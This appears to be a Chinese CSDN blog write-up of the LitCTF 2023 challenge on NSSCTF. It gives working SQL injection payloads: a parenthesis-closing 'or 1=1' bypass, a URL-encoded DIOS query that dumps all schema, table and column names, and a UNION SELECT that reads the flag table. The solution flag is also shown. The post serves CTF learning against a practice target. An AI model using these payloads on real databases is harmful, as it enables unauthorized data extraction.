【CTF Web】NSSCTF 3868 [LitCTF 2023]这是什么?SQL !注一下 !Writeup(SQL注入+报错注入+括号闭合+DIOS)

最新推荐文章于 2024-06-14 10:30:09 发布
最新推荐文章于 2024-06-14 10:30:09 发布
阅读量442 收藏
点赞数 8
分类专栏: CTF Writeup 文章标签: sql 数据库 web安全 安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34988204/article/details/137998291
版权

[LitCTF 2023]这是什么?SQL !注一下 !

为了安全起见多带了几个套罢了o(▽)q
出题人 探姬

解法

先试试这个:

)))))) or 1=1 --

有结果了,但是这个 flag 是假的。

flag 可能在其他表里。用 hackbar 上 DIOS payload。

1))))))%20UNION%20SELECT%201,%20(select%20(@)%20from%20(select(@:=0x00),(select%20(@)%20from%20(information_schema.columns)%20where%20(table_schema>=@)%20and%20(@)in%20(@:=concat(@,0x0D,0x0A,%27%20[%20%27,table_schema,%27%20]%20>%20%27,table_name,%27%20>%20%27,column_name,0x7C))))a)%20--+

flag 在 ctftraining 库的 flag 表中。

1)))))) UNION SELECT 1, flag FROM ctftraining.flag; --+

取得 flag。

Flag

NSSCTF{63d1b3ba-d5d7-420d-9276-c98150270782}

声明

本博客上发布的所有关于网络攻防技术的文章,仅用于教育和研究目的。所有涉及到的实验操作都在虚拟机或者专门设计的靶机上进行,并且严格遵守了相关法律法规

博主坚决反对任何形式的非法黑客行为,包括但不限于未经授权的访问、攻击或破坏他人的计算机系统。博主强烈建议每位读者在学习网络攻防技术时,必须遵守法律法规不得用于任何非法目的。对于因使用这些技术而导致的任何后果,博主不承担任何责任

HEX9CF
关注
  • 8
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
mysql&&sql注入+ctf+web安全
10-08
mysql&&sql注入+ctf+web安全
sql注入攻击流量情况
07-18
sql注入攻击流量情况
SQL注入原理及PHP防入代码.pdf
03-31
SQL注入基本概念,原理,防入php代码以及 相关的图片实例,具体可下载查看。
SQL注入漏洞演示源代码
07-15
SQL注入漏洞演示源代码 更多免费资源请查看:http://download.csdn.net/user/php_fly
ctf+web安全+任意文件上传+任意文件下载
10-08
ctf+web安全+任意文件上传+任意文件下载
mysql-线上常用运维sql-2
jll126的博客
06-11 360
在MySQL中,直接查询当前正在执行的事务可能不是非常直观,因为MySQL并没有提供直接的命令或系统视图来列出所有正在运行的事务。但是,你可以通过几种方法间接地获取这些信息。
LLM之RAG实战(四十)| 使用LangChain SQL Agent和MySQL搭建多层RAG ChatBot
最新发布
wshzd的博客
06-14 587
在第二层,SQL Agent首先获取到用户的问题,然后要求 LLM 根据用户的问题创建 SQL 查询,使用内置函数在MySQL数据库上运行查询。在这里,我们使用的是 ChatPromptTemplate,如果你真的研究它,你会看到它是如何专门编写的,用于创建和运行 SQL 查询。在下一段代码中,将使用上一个代码块中定义的变量创建 QA 链,将消息添加到聊天记录中,然后运行链以获取改进的查询。这是代码的最后一部分,它将首先运行第一层以获取改进的查询,然后我们使用该改进的查询来获得最终响应。
PostgreSQL 快速入门与实战
代码洁癖症患者
06-11 866
# 创建模式## 删除模式## 删除模式并且删除该模式下的数据对象。
PostgreSQL的视图pg_roles
lee_vincent1的博客
06-10 633
pg_roles是 PostgreSQL 中的一个系统视图,提供了关于数据库角色(用户和组)的信息。PostgreSQL 中的角色用于管理数据库的权限、登录能力以及其他安全相关的特性。通过查询pg_roles视图,数据库管理员可以了解和管理数据库中所有角色的详细信息。pg_roles。
JavaSpringboot+vur前后端分离党员信息管理系统(源码+sql+论文)
u014445459的博客
06-11 771
简化系统开发和维护。它做的事情越多,就封装了常见的JavaScript功能和代码,并提供了一个简单的JavaScript设计相关的模式,用于优化HTML文档操作、事件处理、CSS样式化、动画设计和Ajax请求交互。在互联网技术高速发展的今天,通过互联网的传播会让企业更容易的创造更多的经济效益,利用互联网的传播党建信息管理、通过网页版党建信息管理平台的实现 ,让更多人了解到党建新闻、组织风采等相关信息、得到了更大的宣传,在这样一个大环境下把资源统筹规化起来,就会获得高效的党建党员信息和推广。
PostgreSQL的扩展(extensions)-常用的扩展-pg_stat_monitor
lee_vincent1的博客
06-13 519
是 PostgreSQL 的一个扩展,它提供了一种先进的监控和统计 SQL 查询的方式,相比于标准的,它提供了更丰富和详细的查询统计信息。通过捕获和分析 SQL 查询的执行情况,帮助数据库管理员优化数据库性能。
SQL主键回显
m0_63624484的博客
06-09 368
而我一个菜品应该会有多个口味,所以当我们在实现菜品插入功能的时候,我们还需要在插入完成菜品后,再把该菜品的口味也插入到对应的口味表中,而口味表中当然就需要所属菜品的id了。那么现在的问题就是,在菜品还没有插入之前,我是不知道菜品id的,因为菜品id是在菜品插入之后生成的id,所以我就需要在菜品插入完成后,再获得这个菜品生成的id赋值给口味对象,那么就需要使用到主键回显功能。当我们在一个业务功能下操作多张表时,当另一个表数据需要上一个表刚插入的数据的ID时,就需要使用到主键回显。
【DBA早下班系列】—— 并行SQL/慢SQL 问题该如何高效收集诊断信息
汤庆
06-11 1118
OceanBase论坛问答区或者提交工单支持的时候大部分时间都浪费在了诊断信息的获取交互上,今天我就其中大家比较头疼的SQL问题,给大家讲解一下如何一键收集并行SQL/慢SQL所需要的诊断信息,减少沟通成本,让大家早下班。
PostgreSQL Schema管理基础
weixin_43230594的博客
06-11 799
PostgreSQL Schema管理基础
PostgreSQL的视图pg_tables
lee_vincent1的博客
06-10 489
是 PostgreSQL 中的一个系统视图,用于显示当前数据库中所有用户定义的表的信息。这个视图提供了关于表的名称、所属模式(schema)、所有者以及表类型等详细信息。以下是一些常用的查询示例,可以帮助你获取和分析表的信息。 查看特定模式下的所有表 查看表的基本信息 查看特定表的信息 查看是否有索引的表 查看启用了行级安全策略的表 示例脚本 查看所有用户表的信息 查看有触发器的表 可以结合 和 视图查看哪些表有触发器。例如: 使用案例 获取所有表的完整信息 分析索引和触发器情况 通过
SQL Server中的CTE和临时表优化
nbsaas-boot基于Request-Response的企业级快速开发框架
06-09 563
CTE和临时表在SQL Server中的应用各有优劣。CTE简化代码,提高可读性,适合较简单的查询和层次结构数据处理。而临时表则提供更高的灵活性和性能优化手段,适用于复杂的多步骤查询和大数据量处理。在实际应用中,我们需要根据具体需求选择最合适的技术手段,以达到最佳的性能和可维护性。
SQLAlChemy】如何定义ORM模型,如何映射到数据库
weixin_55818116的博客
06-08 458
使用SQLAlChemy如何定义ORM模型,如何将其映射到数据库中,快来看看这篇文章吧。
【Nacos 2.3.3支持Postgre SQL数据源配置】
qq_35543206的博客
06-09 369
nacos配置postgresql数据库
PostgreSQL的视图pg_rules
lee_vincent1的博客
06-11 451
是 PostgreSQL 中的一个系统视图,用于显示数据库中存在的规则(rules)的相关信息。规则是一种允许在表的查询、插入、更新或删除操作上定义自定义行为的机制。通过查询 视图,数据库管理员和开发人员可以查看当前数据库中定义的所有规则信息。以下是一些常用的查询示例,可以帮助你获取和分析规则的信息。 查看特定模式下的所有规则 查看特定表的所有规则 查看特定规则的信息 显示所有规则及其所属的表和定义 获取所有规则的完整信息 查看特定表的所有规则定义 根据规则名称查找规则 通过 视图,数据库
ctf sql注入题目
09-15
CTF(Capture The Flag)中的SQL注入题目提供了一个模拟真实情境下的网络安全挑战,旨在测试参与者对于SQL注入漏洞的理解和应用能力。以下是一些CTF SQL注入题目的例子: 1. BUUCTF-[极客大挑战 2019]EasySQL 这是...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值